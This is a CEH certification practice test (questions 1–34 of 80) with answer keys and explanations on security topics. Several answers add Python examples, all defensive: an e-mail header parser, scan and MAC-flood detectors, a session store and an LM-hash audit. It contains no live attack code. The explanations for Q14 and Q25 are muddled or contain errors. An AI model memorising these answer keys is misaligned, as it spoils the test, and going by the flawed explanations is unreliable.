CEH Practice Test 2
Question 1 of 80
1. Question
Which of the following attacks is also known as “cross-guest VM breach”?
Correct Answer:
Side channel is correct.
Side-channel attacks, also known as “cross-guest VM breach,” deal with the virtualization itself. If an attacker can somehow gain control of an existing VM (or place his own) on the same physical host as the target, he may be able to pull off lots of naughty activities.
Incorrect Answers:
Session riding, CSRF, and VM strafing are incorrect.
Session riding is, in effect, simply CSRF under a different name and deals with cloud services instead of traditional data centers.
CSRF is an attack leveraging a legitimate open session with a phishing attack to send a message from the user’s browser to the target server without the user knowing it.
VM strafing sounds like fun, depending on the caliber, but is not a legitimate attack.
Question 2 of 80
2. Question
Which of the following describes a primary advantage for using Digest authentication over Basic authentication?
Correct Answer:
Digest authentication never sends a password in clear text over the network is correct.
There are a couple of different methods a web page can use to negotiate credentials with a web user using HTTP. Digest authentication hashes a password before sending it, whereas Basic just sends it in plain text.
Incorrect Answers:
Digest authentication uses multifactor authentication, In Digest authentication, the password is sent in clear text over the network but is never reused, and In Digest authentication, Kerberos is used to encrypt the password are incorrect.
The remaining answers do not describe Digest authentication.
Question 3 of 80
3. Question
Which of the following is a passive wireless discovery tool?
Correct Answer:
Kismet is correct.
Kismet works as a passive network discovery tool, without using packet injection to gather information. Kismet also works by channel hopping to discover as many networks as possible and has the ability to sniff packets and save them to a log file, readable by Wireshark or tcpdump.
Incorrect Answers:
NetStumbler, Aircrack, and Netsniff are incorrect.
NetStumbler is an active discovery tool. Aircrack is a WEP cracking program. Netsniff is a false choice.
Question 4 of 80
4. Question
Which of the following is most likely to interfere with a system’s resource usage?
Correct Answer:
HIDS is correct.
A host-based intrusion detection system (HIDS) is, by design, host based. Therefore, it is installed on the system itself and eats up resources like I do hot doughnuts. HIDSs are great at providing an additional layer of protection in your environment, but they do come at a resource cost.
Incorrect Answers:
IPS, Packet-filtering firewall, and NIDS are incorrect.
An intrusion prevention system, packet-filtering firewall, and network intrusion detection system are all network based and would not drain host resources.
Question 5 of 80
5. Question
Which of the following is a symmetric algorithm?
Correct Answer:
DES is correct.
DES is the only symmetric algorithm listed.
Incorrect Answers:
SHA-1, Diffie-Hellman, and ECC are incorrect.
None of these options is a symmetric algorithm.
Question 6 of 80
6. Question
Examine this robots.txt file:

```
User-agent: *
Disallow: /
```

Which of the following is true regarding the website this file is currently residing on?
Correct Answer:
All web spiders are prevented from indexing any page on the site is correct.
robots.txt files are annoying little entries on the exam but are easy enough to figure out. The User-agent section defines which web crawler you’re attempting to advise (in this case, all of them). The Disallow section defines those areas you do not want the crawler to sift through; just having a slash (/) effectively states “don’t look at anything here.”
Incorrect Answers:
All web spiders are allowed to index any page on the site, Only authenticated web spiders are prevented from indexing any page on the site, and Only authenticated web spiders are allowed to index any page on the site are incorrect.
These answers do not match the * entry in User-agent and the / entry in Disallow.
Question 7 of 80
7. Question
Payment Card Industry Data Security Standard (PCI-DSS) requires organizations to perform external and internal penetration testing. What is the required occurrence?
Correct Answer:
At least once a year and after any significant infrastructure or application upgrade or modification is correct.
PCI-DSS requires organizations to be tested at least once a year, and of course after any “significant” modifications.
Incorrect Answers:
At least once every three years and after any significant infrastructure or application upgrade or modification, At least once every two years and after any significant infrastructure or application upgrade or modification, and Twice annually and after any significant infrastructure or application upgrade or modification are incorrect.
These answers don’t reflect PCI-DSS requirements.
Question 8 of 80
8. Question
Which of the following is least likely to mitigate social engineering attacks?
Correct Answer:
Ensuring strong password policy is in place and enforced is correct.
What good does a really strong password do you if you hand it over to the nice gentleman calling from the help desk about your computer problems?
Incorrect Answers:
Beginning user education programs in the organization, Installing anti-malware systems on organization desktops, and Implementing e-mail gateways are incorrect.
User education is always a good step.
Anti-malware will help prevent damage done when someone falls victim to social engineering.
E-mail gateways screen and filter incoming messages for malicious content.
Question 9 of 80
9. Question
Which of the following best describes a wrapping attack?
Correct Answer:
A SOAP message is intercepted, data in the envelope is changed, and then it is sent/replayed is correct.
Wrapping attacks involve messing with SOAP messages and replaying them as legitimate.
Incorrect Answers:
CSRF-type attack against cloud computing resources, An attack involving leveraging a new or existing VM on a physical device against another VM, and The virtual machine management system on the physical machine is corrupted or administrative control is gained over it are incorrect.
These do not reflect a wrapping attack.
Question 10 of 80
10. Question
James is a member of a pen test team newly hired to test a bank’s security. He begins searching for IP addresses the bank may own, using public records on the Internet, and also looks up news articles and job postings to discover information that may be valuable. What phase of the pen test is James working?
Correct Answer:
Pre-attack is correct.
The pre-attack phase (a.k.a. the preparation phase) is where all this activity takes place—including the passive information gathering performed by James in this example. This would be followed by the attack and post-attack phases.
Incorrect Answers:
Reconnaissance, Assessment, Attack, and Scanning are incorrect.
Reconnaissance and scanning are part of the ethical hacking phases (reconnaissance, scanning/enumeration, gaining access, maintaining access, and clearing tracks).
Assessment is akin to the attack phase.
Question 11 of 80
11. Question
A web application in your organization provides significant benefit to the accounting team. However, after a vulnerability scan and a risk assessment, it is determined the application presents significant risk if exposed to external attackers. The server hosting the application is moved inside the DMZ and strong access controls are put into place, allowing only the accounting team to use it. Which of the following best describes the risk method used here?
Correct Answer:
The organization is mitigating the risk is correct.
The actions taken and controls put in place are designed to mitigate the risk—reducing greatly the likelihood it will ever happen.
Incorrect Answers:
Accepting the risk equates to not doing anything at all.
Transferring the risk occurs when a company shifts the risk to another party.
Avoiding the risk is removing it altogether.
Question 12 of 80
12. Question
You want to create a document that shows how to install data-at-rest protection within your system. Which of the following is the best descriptor of the document you are creating?
Correct Answer:
Procedure is correct.
A procedures document is a step-by-step description of how to accomplish a specific task.
Incorrect Answers:
Guideline, Standard, and Policy are incorrect.
Guidelines are discretionary but highly encouraged (that is, you may not absolutely require DAR protection on all systems, but your guidelines document might encourage users to use it anyway).
A standard defines technical aspects of your security architecture (like what software and hardware are necessary) and is mandatory.
A policy is an overarching document that contains the purpose, scope, responsibilities, and compliance details of your security program.
Question 13 of 80
13. Question
While using your bank’s online services, you notice the following string in the URL bar: http://www.MyPersonalBank/Account?Id=368940911028389&Damount=10980&Camount=21 You observe that if you modify the Damount and Camount values and submit the request, the data on the web page reflect the changes. What type of vulnerability is present on this site?
Correct Answer:
Parameter tampering is correct.
One of the easiest things you can attempt is simply changing the parameter fields in a URL and seeing what happens.
Incorrect Answers:
SQL injection, XSS, and Cookie tampering are incorrect.
These do not reflect the attack shown.
Question 14 of 80
14. Question
Which TCP flag is used to force transmission of data even if the buffer is full?
Correct Answer:
PSH is correct.
The PSH flag is used when the application simply can’t wait for the data and needs it immediately. The sender will be working through a standard exchange and placing packets into the buffer as space frees up. An URG packet gets sent regardless of the buffer status; it simply goes.
Incorrect Answers:
An URG flagged packet is treated with importance, almost like holding a reservation tag that lets you go to the front of the line when you arrive at your destination.
ACK is used for acknowledgments, and FIN brings an orderly close to the session.
Question 15 of 80
15. Question
Your organization uses a cloud computing model that shares cloud infrastructure for data and services. Which deployment model matches this description?
Correct Answer:
Community is correct.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
Incorrect Answers:
Private, Public, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet).
The hybrid cloud model is a composite of two or more cloud deployment models.
Question 16 of 80
16. Question
Examine the e-mail header provided. Which of the following represents the true originator of the e-mail message?

```
Return-path:
Delivery-date: Wed, 13 Apr 2011 00:31:13 +0200
Received: from mailexchanger.anotherbiz.com([185.213.4.77]) by mailserver.anotherbiz.com running ExIM with esmtp id xxxxxx-xxxxxx-xxx; Wed, 13 Apr 2011 01:39:23 +0200
Received: from mailserver.anybiz.com ([177.190.50.254] helo=mailserver.anybiz.com) by mailexchanger.anotherbiz.com with esmtp id xxxxxx-xxxxxx-xx for [email protected]; Wed, 13 Apr 2011 01:39:23 +0200
Received: from SOMEONEComputer [229.88.53.154] (helo=[SOMEONEcomputer]) by mailserver.anybiz.com with esmtpa (Exim x.xx) (envelope-from [email protected]; Tue, 12 Apr 2011 20:36:08 -0100
Message-ID:
Date: Tue, 12 Apr 2011 20:36:01 -0100
X-Mailer: Mail Client
From: SOMEONE Name
To: USERJOE Name
Subject: Something to consider
…
```
Correct Answer:
The originator is 229.88.53.154 is correct.
On e-mail headers, you’ll most likely be asked to identify the true originator—although there are many other entries to pay attention to. The machine (person) who sent the message in the first place may be impossible to truly decipher, since in the real world attackers have proxies and whatnot to hide behind; however, we can only go off the header provided. From the bottom up (the bottom entry is the first in the line), the originator is clearly shown: Received: from SOMEONEComputer [229.88.53.154] (helo=[SOMEONEcomputer]).
Incorrect Answers:
The originator is 185.213.4.77, The originator is 177.190.50.254, and The e-mail header does not show this information are incorrect.
These IPs do not represent the true originator of the message.
They show e-mail servers that are passing/handling the message.
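The bottom-up reading of the Received chain, done programmatically, as an added example that is not part of the practice test or its source book. It parses the question's header (reconstructed below; the e-mail addresses are constructed placeholders where the question obfuscates them, and the blank Return-path and Message-ID values are left blank as on the page), reports the originator, and adds the check a forensic analyst wants: each hop's "from" host should be the server that wrote the hop below it, because Received lines forged by the sender usually break that linkage.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: the header from the question, folded the way an MTA writes it.
# Hosts, addresses and ids are the question's placeholders, not real systems.
SAMPLE_HEADER = """\
Return-path:
Delivery-date: Wed, 13 Apr 2011 00:31:13 +0200
Received: from mailexchanger.anotherbiz.com([185.213.4.77])
    by mailserver.anotherbiz.com running ExIM with esmtp id xxxxxx-xxxxxx-xxx;
    Wed, 13 Apr 2011 01:39:23 +0200
Received: from mailserver.anybiz.com ([177.190.50.254] helo=mailserver.anybiz.com)
    by mailexchanger.anotherbiz.com with esmtp id xxxxxx-xxxxxx-xx
    for userjoe@anotherbiz.com; Wed, 13 Apr 2011 01:39:23 +0200
Received: from SOMEONEComputer [229.88.53.154] (helo=[SOMEONEcomputer])
    by mailserver.anybiz.com with esmtpa (Exim x.xx)
    (envelope-from someone@anybiz.com); Tue, 12 Apr 2011 20:36:08 -0100
Message-ID:
Date: Tue, 12 Apr 2011 20:36:01 -0100
X-Mailer: Mail Client
From: SOMEONE Name
To: USERJOE Name
Subject: Something to consider
"""

RECEIVED_RE = re.compile(
    r"from\s+(?P<from_host>[^\s(\[]+)"                 # name the sender claimed
    r".*?\[(?P<from_ip>\d{1,3}(?:\.\d{1,3}){3})\]"      # address the receiver recorded
    r".*?\bby\s+(?P<by_host>[^\s(\[;]+)",               # server that wrote this line
    re.DOTALL,
)


def unfold_headers(raw: str) -> List[str]:
    """Join RFC 5322 continuation lines (leading whitespace) back onto their field."""
    fields: List[str] = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and fields:
            fields[-1] += " " + line.strip()
        elif line.strip():
            fields.append(line)
    return fields


def received_chain(raw: str) -> List[Dict[str, str]]:
    """Received hops in header order: top of the list is the last hop, bottom the first."""
    hops = []
    for field in unfold_headers(raw):
        if field.lower().startswith("received:"):
            m = RECEIVED_RE.search(field)
            if m:
                hops.append(m.groupdict())
    return hops


def chain_is_linked(hops: List[Dict[str, str]]) -> bool:
    """Every hop's 'from' host must be the 'by' host of the hop below it."""
    return all(
        upper["from_host"].lower() == lower["by_host"].lower()
        for upper, lower in zip(hops, hops[1:])
    )


def originator(raw: str) -> Optional[str]:
    """Bottom-most Received line = first hop = address seen by the originating MTA."""
    hops = received_chain(raw)
    return hops[-1]["from_ip"] if hops else None


if __name__ == "__main__":
    chain = received_chain(SAMPLE_HEADER)
    for hop in chain:
        print(f"{hop['from_host']:<30} [{hop['from_ip']:<15}] -> {hop['by_host']}")
    print("originator:", originator(SAMPLE_HEADER))
    print("chain linked:", chain_is_linked(chain))
```

The linkage check is the caveat the explanation hints at: the bottom line is only as trustworthy as the server that wrote it, so a Received line that no upstream server accounts for is a sign the sender appended it.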
Question 17 of 80
17. Question
During a pen test, the team lead decides to attempt intrusion using the organization’s BlackBerry Enterprise. Which tool is used in the blackjacking attempt?
Correct Answer:
BBProxy is correct.
Since BlackBerry devices are basically VPN’d into the corporate network, they can provide a nice back way in, using the proper technique. Blackjacking involves setting up a proxy and bouncing things off and through it into the internal network. BBProxy was presented during a DEF CON conference several years ago as a means to pull off this attack.
Incorrect Answers:
Aircrack, Kismet, and PrismStumbler are incorrect.
Aircrack is used to crack WEP encryption keys.
Kismet is best known as a passive wireless sniffer.
PrismStumbler is a wireless network identifier.
Question 18 of 80
18. Question
Which of the following would most likely be used to encrypt an entire hard drive?
Correct Answer:
PGP is correct.
Pretty Good Privacy (PGP) uses an asymmetric encryption method to encrypt information.
Although generally associated with e-mail, it can encrypt virtually anything. PGP uses public/private key encryption.
Incorrect Answers:
TLS, SSH, and SSL are incorrect.
TLS and SSL are protocols that encrypt network traffic. SSH is an encrypted replacement for Telnet.
Question 19 of 80
19. Question
OSSTMM defines interactive and process controls. Which of the following are process controls?
Correct Answer:
Nonrepudiation, confidentiality, privacy is correct.
The Open Source Security Testing Methodology Manual (OSSTMM) notes ten different types of controls. Process controls are nonrepudiation, confidentiality, privacy, integrity, and alarm.
Incorrect Answers:
Authentication, indemnification, resilience, Subjugation, continuity, authentication, and Integrity, alarm, authentication are incorrect.
Interactive controls include authentication, indemnification, resilience, subjugation, and continuity.
Question 20 of 80
20. Question
You are performing an XMAS scan and get an RST/ACK packet back from a port. What does this indicate?
Correct answer:
The port is closed is correct.
An RST/ACK on an XMAS scan indicates a closed port.
Incorrect answers:
The port is open, The scan has failed to reach the target, and None of the above are incorrect.
No response would indicate an open port or that the scan failed to reach the target.
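The interpretation above in code, as an added example that is not part of the practice test: one function maps the reply to an XMAS probe to the port state the scanner concludes, and a second, written from the defender's side, picks XMAS probes out of a constructed packet feed and flags sources that sweep many ports. The record format and the `min_ports` threshold are assumptions for the example.

```python
from typing import Dict, List, Optional, Tuple

# TCP flag bits as laid out in the flags byte.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
XMAS = FIN | PSH | URG


def is_xmas_probe(flags: int) -> bool:
    """An XMAS probe lights up FIN, PSH and URG with neither SYN nor ACK set."""
    return flags & XMAS == XMAS and not flags & (SYN | ACK)


def infer_port_state(reply_flags: Optional[int]) -> str:
    """What the scanner concludes from the reply (or silence) to one XMAS probe."""
    if reply_flags is None:
        return "open|filtered"   # no reply: open, or the probe never reached the host
    if reply_flags & RST:
        return "closed"          # RST/ACK: a closed port answered per RFC 793
    return "unexpected"          # anything else is not standard TCP behaviour


# Constructed packet records: (src, dst, dport, flags, reply_flags).
# Addresses come from documentation ranges, not real hosts.
SAMPLE_PACKETS: List[Tuple[str, str, int, int, Optional[int]]] = [
    ("203.0.113.5", "192.0.2.10", 22, XMAS, RST | ACK),
    ("203.0.113.5", "192.0.2.10", 80, XMAS, None),
    ("203.0.113.5", "192.0.2.10", 443, XMAS, None),
    ("203.0.113.5", "192.0.2.10", 8080, XMAS, RST | ACK),
    ("203.0.113.5", "192.0.2.10", 3306, XMAS, RST | ACK),
    ("203.0.113.5", "192.0.2.10", 25, XMAS, RST | ACK),
    ("198.51.100.7", "192.0.2.10", 443, SYN, SYN | ACK),   # an ordinary handshake
    ("198.51.100.7", "192.0.2.10", 443, ACK, None),
]


def xmas_scanners(packets, min_ports: int = 5) -> Dict[str, int]:
    """Sources that sent XMAS probes to at least min_ports distinct ports of one host."""
    probed: Dict[Tuple[str, str], set] = {}
    for src, dst, dport, flags, _ in packets:
        if is_xmas_probe(flags):
            probed.setdefault((src, dst), set()).add(dport)
    return {src: len(ports) for (src, _), ports in probed.items() if len(ports) >= min_ports}


def port_states(packets, src: str, dst: str) -> Dict[int, str]:
    """What a given scanner learned per port, reconstructed from probe/reply pairs."""
    return {
        dport: infer_port_state(reply)
        for s, d, dport, flags, reply in packets
        if s == src and d == dst and is_xmas_probe(flags)
    }


if __name__ == "__main__":
    print("scanners:", xmas_scanners(SAMPLE_PACKETS))
    print("states:", port_states(SAMPLE_PACKETS, "203.0.113.5", "192.0.2.10"))
```

Because a legitimate TCP stack never sends FIN, PSH and URG together without SYN or ACK, the probe signature itself is a high-confidence detection; the port-count threshold only keeps a single stray packet from paging anyone.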
Question 21 of 80
21. Question
Which of the following is not a component of a Kerberos system?
Correct Answer:
PKI is correct.
A Kerberos system is composed of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and a ticket granting ticket (TGT). PKI has nothing to do with it.
Incorrect Answers:
KDC, AS, TGT, and TGS are incorrect.
These are all part of a Kerberos system.
Question 22 of 80
22. Question
A switch CAM table is filled with faulty MAC addresses, using up all available space in the table. Which of the following has occurred?
Correct Answer:
MAC flood is correct.
A MAC flood is just what it sounds like—the switch is flooded with thousands of MAC address mappings such that it cannot keep up. When the table can’t keep up, the switch stops filtering messages to ports and begins flooding itself, sending every message out every port.
Incorrect Answers:
SYN flood, CAM attack, and ARP spoofing are incorrect.
SYN flood is not a switch attack.
ARP spoofing will help in active sniffing, but it is not the same as MAC flooding.
CAM attack is not a valid term.
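A detection for the condition described above, as an added example that is not part of the practice test: an access port normally shows a handful of source MAC addresses, so a port suddenly sourcing hundreds of never-before-seen addresses is the CAM table being stuffed. The frame records, port names and the `max_sources` threshold are constructed assumptions for the example; a real feed would be a SPAN capture or the switch's own MAC-table counters.

```python
import random
from collections import defaultdict
from typing import Dict, List, Tuple


def build_sample_frames() -> List[Tuple[str, str]]:
    """Constructed (switch_port, src_mac) records; fixed seed so the sample is reproducible."""
    rng = random.Random(7)
    frames: List[Tuple[str, str]] = []
    normal_1 = ["00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:03"]
    normal_2 = ["00:11:22:33:44:10", "00:11:22:33:44:11"]
    for _ in range(200):                       # ordinary traffic on two access ports
        frames.append(("Gi1/0/1", rng.choice(normal_1)))
        frames.append(("Gi1/0/2", rng.choice(normal_2)))
    for _ in range(400):                       # port 7 sources 400 random MACs
        mac = ":".join(f"{rng.randrange(256):02x}" for _ in range(6))
        frames.append(("Gi1/0/7", mac))
    return frames


def distinct_sources_per_port(frames) -> Dict[str, int]:
    """How many different source MACs each port has been seen to carry."""
    seen = defaultdict(set)
    for port, src_mac in frames:
        seen[port].add(src_mac.lower())
    return {port: len(macs) for port, macs in seen.items()}


def flooding_ports(frames, max_sources: int = 50) -> List[str]:
    """Ports whose source-MAC count exceeds what an access port should ever need.
    The threshold mirrors the limit a port-security configuration would enforce."""
    counts = distinct_sources_per_port(frames)
    return sorted(port for port, n in counts.items() if n > max_sources)


if __name__ == "__main__":
    sample = build_sample_frames()
    for port, n in sorted(distinct_sources_per_port(sample).items()):
        print(f"{port}: {n} source MACs")
    print("flooding:", flooding_ports(sample))
```

The same per-port limit is the mitigation: port security with a maximum MAC count (and a violation action of shutdown or restrict) stops the table from filling in the first place, so the switch never falls back to flooding every frame out every port.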
Question 23 of 80
23. Question
Which of the following are components of a Kerberos system? (Choose all that apply.)
Correct Answers:
KDC, AS, TGS, and TGT are correct.
A Kerberos system is composed of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and a ticket granting ticket (TGT).
Incorrect Answer:
PKI is incorrect.
Kerberos does not make use of any PKI facets in its system.
Question 24 of 80
24. Question
What is considered the best option against session hijacking?
Correct Answer:
Use unpredictable sequence numbers is correct.
Session hijacking requires the attacker to guess the proper upcoming sequence number(s) to pull off the attack, pushing the original client out of the session. In the real world, where the predictability of sequence numbers is a function of the operating system, for 99.999% of systems out there configuring sequence numbers is just simply not something you can do. On your exam, though, this is definitely something to remember. For your exam, just remember that using unpredictable session IDs in the first place protects against this. Other countermeasures for session hijacking are fairly common sense: use encryption to protect the channel, limit incoming connections, minimize remote access, and regenerate the session key after authentication is complete.
Incorrect Answers:
Use only nonroutable protocols, Use a file-verification application such as Tripwire, and Use good password policy are incorrect.
These choices would do nothing to stop session hijacking.
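Two of the countermeasures listed above, unpredictable session IDs and regenerating the session key after authentication, in a minimal server-side session store. This is an added example, not code from the practice test or any framework; the `SessionStore` class, its TTL and the `looks_sequential` check are assumptions made for the illustration.

```python
import secrets
import time
from typing import Dict, Iterable, Optional

SESSION_ID_BYTES = 32   # 256 bits from the OS CSPRNG; not guessable, not enumerable


class SessionStore:
    """Server-side sessions keyed by an unpredictable ID."""

    def __init__(self, ttl_seconds: int = 900):
        self._sessions: Dict[str, dict] = {}
        self._ttl = ttl_seconds

    @staticmethod
    def new_id() -> str:
        return secrets.token_urlsafe(SESSION_ID_BYTES)   # never a counter or timestamp

    def create(self) -> str:
        """Anonymous (pre-login) session, e.g. for a shopping cart or CSRF token."""
        sid = self.new_id()
        self._sessions[sid] = {"user": None, "expires": time.time() + self._ttl}
        return sid

    def get(self, sid: str) -> Optional[dict]:
        sess = self._sessions.get(sid)
        if sess is None or sess["expires"] < time.time():
            self._sessions.pop(sid, None)
            return None
        return sess

    def login(self, sid: str, user: str) -> Optional[str]:
        """Bind the user to a fresh ID. The pre-login ID, which an attacker may have
        observed or planted (session fixation), is invalidated at the same time."""
        sess = self.get(sid)
        if sess is None:
            return None
        del self._sessions[sid]
        new_sid = self.new_id()
        self._sessions[new_sid] = {"user": user, "expires": time.time() + self._ttl}
        return new_sid

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def looks_sequential(ids: Iterable[str]) -> bool:
    """Sanity check for the failure mode the question warns about: hex IDs that
    advance by a constant step are predictable and should fail review."""
    try:
        nums = [int(i, 16) for i in ids]
    except ValueError:
        return False            # not even hex-shaped, so not a simple counter
    diffs = {b - a for a, b in zip(nums, nums[1:])}
    return len(nums) > 2 and len(diffs) == 1


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create()
    authed = store.login(anon, "alice")
    print("pre-login id still valid:", store.get(anon) is not None)
    print("post-login id valid:", store.get(authed)["user"])
    print("counter-style ids sequential:", looks_sequential(["00a1", "00a2", "00a3"]))
```

Pair this with the remaining items in the list (TLS for the channel, a short idle timeout) and the session cookie's `Secure` and `HttpOnly` attributes; an unguessable ID is only a defence while it cannot simply be read off the wire.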
Question 25 of 80
25. Question
You are viewing LM hashes and note this one in particular: 3A02FB4397CFC4FFFAAD3B435B51404EE Which of the following passwords would create the LM hash?
Correct answer:
M@tt123 is correct. Forget the characters in the password itself and just look at the length. If it’s seven characters or less, the last half of the LM hash will be AAD3B435B51404EE.
Incorrect answers:
M@tt1234, 1234M@tt, and 123M@ttt are incorrect. These are all longer than seven characters.
Question 26 of 80
26. Question
Which of the following statements is true regarding WEP cracking?
Correct Answer:
Initialization Vectors are small, get reused frequently, and are sent in clear text is correct.
An Initialization Vector (IV) provides for confidentiality and integrity. Wireless encryption algorithms use it to calculate an integrity check value (ICV), appending it to the end of the data payload. The IV is then combined with a key to be input into an algorithm (RC4 for WEP, AES for WPA-2). Initialization Vectors in WEP are small, get reused frequently, and are sent in clear text.
Incorrect Answers:
Initialization Vectors are small, get reused frequently, but are encrypted during transmission, Initialization Vectors are large, get reused frequently, and are sent in clear text, and Initialization Vectors are large, get reused frequently, but are encrypted during transmission are incorrect.
The other answers do not match the truth regarding IVs.
Question 27 of 80
27. Question
You are viewing LM hashes and note this one in particular: 3A02FB4397CFC4FFFAAD3B435B51404EE Which of the following would create the LM hash?
Correct Answer:
M@tt123 is correct. Forget the characters in the password itself and just look at the length. If it’s seven characters or less, the last half of the LM hash will be AAD3B435B51404EE.
Incorrect Answers:
All other answers are incorrect. These are all longer than seven characters.
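The length rule used in questions 25 and 27, turned into the audit a defender runs over a password-hash dump, as an added example that is not part of the practice test. The fixed half AAD3B435B51404EE is what the LM algorithm produces for an empty seven-byte block (DES of its constant with an all-zero key), so a hash ending in it means the password is seven characters or shorter, and a hash made of two such halves means the password is blank or LM storage is disabled. The pwdump-style input lines and all hash values are constructed; the first line reuses the leading half from the question, trimmed to the 16 hex digits a real half has.

```python
from typing import List, Tuple

LM_EMPTY_HALF = "AAD3B435B51404EE"     # DES of the LM constant under an all-zero key
LM_EMPTY = LM_EMPTY_HALF * 2           # both halves empty: blank password or no LM hash

# Constructed pwdump-style lines: user:RID:LM hash:NT hash:::
# None of these are real credentials; only the structure of the LM field matters.
SAMPLE_DUMP = """\
shortpw:1001:3A02FB4397CFC4FFAAD3B435B51404EE:5F7C2E9B1D4A6C8E0F3B5D7A9C1E3F5B:::
longpw:1002:1C3A2B6E7F9D0E5A4B8C7D6E5F4A3B2C:9D3C1F0E2B4A6C8E0F1D3B5A7C9E1B3D:::
nolm:1003:AAD3B435B51404EEAAD3B435B51404EE:2B4D6F8A0C2E4A6C8E0A2C4E6A8C0E2A:::
broken:1004:ZZZ:2B4D6F8A0C2E4A6C8E0A2C4E6A8C0E2A:::
"""


def classify_lm(lm_hash: str) -> str:
    """What the structure of an LM hash reveals about the password length."""
    h = lm_hash.strip().upper()
    if len(h) != 32 or any(c not in "0123456789ABCDEF" for c in h):
        return "malformed"
    if h == LM_EMPTY:
        return "empty-or-disabled"
    if h[16:] == LM_EMPTY_HALF:
        return "seven-or-fewer"        # second DES block carried no characters
    return "eight-to-fourteen"         # both blocks populated


def audit_lm_dump(dump: str) -> List[Tuple[str, str]]:
    """(username, finding) for every account line in a pwdump-style listing."""
    findings = []
    for line in dump.splitlines():
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, lm = parts[0], parts[2]
        findings.append((user, classify_lm(lm)))
    return findings


def accounts_needing_attention(dump: str) -> List[str]:
    """Accounts whose LM hash leaks length information: any populated LM hash at all
    is a finding, since a stored LM hash means the password is at most 14 characters
    and case-insensitive; short ones are the most urgent."""
    return [user for user, finding in audit_lm_dump(dump)
            if finding in ("seven-or-fewer", "eight-to-fourteen")]


if __name__ == "__main__":
    for user, finding in audit_lm_dump(SAMPLE_DUMP):
        print(f"{user:<10} {finding}")
```

The mitigation is the one the structure implies: disable LM hash storage (the NoLMHash policy) and enforce passwords longer than 14 characters, after which every account shows the empty-or-disabled pattern and the length leak disappears.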
Question 28 of 80
28. Question
Which command displays all running processes on a Linux machine?
Correct Answer:
ps -ef is correct.
The ps command is used in Linux to display processes. The -e switch selects all processes, and the -f switch provides a full listing.
Incorrect Answers:
ls -l, su, and ls -d are incorrect.
The ls command in Linux lists files inside a storage directory.
The su command in Linux is for “switch user.”
Question 29 of 80
29. Question
You are cataloging asset worth in the environment. A particular hard drive fails once every three years and costs $300 to replace. Fourteen hours is required to restore normal operations on a failure. Recovery technicians earn $10 an hour. Which of the following is the closest approximate cost of the ALE?
Correct Answer:
$146 is correct.
ALE = SLE × ARO. In this case, SLE = $300 (replacement) + $140 (14 hours @ $10/hour) = $440, and ARO = 1/3, or roughly 33 percent (1 failure every 3 years). ALE = $440 × 1/3 ≈ $146.
Incorrect Answers:
$400 , $440, and $333 are incorrect.
These answers are not correct calculations, given ALE = SLE × ARO.
Question 30 of 80
30. Question
The loopback address represents the local host and in IPv4 was represented by 127.0.0.1. What is the loopback address in IPv6?
Correct Answer:
::1 is correct.
IPv6 uses a 128-bit address instead of the 32-bit IPv4 version. It’s represented as eight groups of four hexadecimal digits separated by colons but can be shortened in display by removing leading zeroes (replaced by a double colon). The loopback address, in full, is 0000:0000:0000:0000:0000:0000:0000:0001, which can be reduced all the way down to ::1.
Incorrect Answers:
fe80::/10, fc00::/7, and fec0::/10 are incorrect.
These values do not represent the loopback address in IPv6. In particular, fe80::/10 is reserved for link local, fc00::/7 is the unique local (like private addressing in IPv4), and fec0::/10 is for site local.
Question 31 of 80
31. Question
From the command sequence provided, which of the following best describes the intent?
```
C:\> nslookup
Default Server: ns1.anybiz.com
Address: 200.76.153.12
> set type=HINFO
> someserver
Server: resolver.anybiz.com
Address: 200.76.153.5
Someserver.anybiz.com CPU=Intel Quad Chip OS=Linux 2.8
```
Correct Answer:
The operator is enumerating a system named someserver is correct.
The HINFO record type was defined in RFC 1035 and was originally intended to provide the type of computer and operating system a host uses (additionally, you could put in room numbers and other descriptions in the record). In this example, the type is set to HINFO, and a machine name—someserver—is provided.
Incorrect Answers:
The operator is attempting DNS poisoning, The operator is attempting a zone transfer, and The operator is attempting to find a name server are incorrect.
DNS poisoning is not carried out this way. In this command sequence, the operator is asking for information, not pushing up false entries to a name server.
This is also not how nslookup is used to perform a zone transfer (the correct method is the “set type=any” command and then “ls -d anybiz.com”).
Lastly, checking for name servers in the domain would require the “set type=NS” command.
Question 32 of 80
32. Question
Your cloud deployment method shares infrastructure with several organizations. Which of the following best describes your deployment method?
Correct Answer:
Community is correct.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations. For example, multiple different state-level organizations may get together and take advantage of a community cloud for services they require.
Incorrect Answers:
Private, Public, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet).
The hybrid cloud model is exactly what it sounds like—a composite of two or more cloud deployment models.
Question 33 of 80
33. Question
Background checks on employees, risk assessments on devices, and policies regarding key management and storage are examples of ___________ measures within physical security.
Correct Answer:
Operational is correct.
Operational measures are the policies and procedures you set up to enforce a security-minded operation.
Incorrect Answers:
physical, technical, and None of the above are incorrect.
Physical controls include all the things you can touch, taste, smell, or get shocked by.
Technical controls are measures taken with technology in mind to protect explicitly at the physical level.
Question 34 of 80
34. Question
A team member advises that sometimes metadata in publicly available documents can provide valuable intelligence on a target. Which of the following tools can perform a metadata search for you?
Correct Answer:
Metagoofil is correct.
Metagoofil is an information-gathering tool designed for extracting metadata of public documents belonging to a target company. It performs Google searches to identify and download documents to a local disk and then extract the metadata (using different libraries such as Hachoir, PdfMiner, and others). With the results, it will generate a report with usernames, software versions, and servers or machine names that will help penetration testers in the information-gathering phase.
Incorrect Answers:
Nmap, Netcat, and Google Matrix are incorrect.
